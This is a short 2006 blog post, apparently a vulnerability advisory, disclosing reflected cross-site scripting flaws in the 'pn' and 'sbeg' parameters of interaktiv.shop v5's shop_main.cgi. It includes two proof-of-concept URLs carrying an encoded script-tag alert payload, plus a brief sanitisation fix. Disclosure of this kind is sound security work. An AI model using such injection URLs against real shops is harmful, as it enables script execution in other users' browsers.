by r0t,der4444,cembo,VietMafia

Monday, April 10, 2006

interaktiv.shop v.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 10 april 2006
vendor:http://www.interaktiv.net/
affected versions:.V.5 and prior
###############################################


Vuln. Description:


interaktiv.shop contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "pn" and "sbeg" parameter in "shop_main.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/cgi-bin/interaktiv.shop/front/shop_main.cgi?func
=det&wkid=41587822301246215&rub1=Footprints&rub2=
Architect&artnr=114&pn=%22%3Cscript%3Ealert('r0t'
)%3C/script%3E


/cgi-bin/interaktiv.shop/front/shop_main.cgi?fun
c=searchdo&sfields=&wkid=41587822301246215&rub1_
search=all&sfield=1&sbeg=%22%3Cscript%3Ealert('r
0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Greetings to: der4444,xaPridel,cembo,g0df4th3r,
waraxe,FrozenEye,str0ke,RaZbh,rst team,nst team
###############################################
More information @ unsecured-systems.com/forum/

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew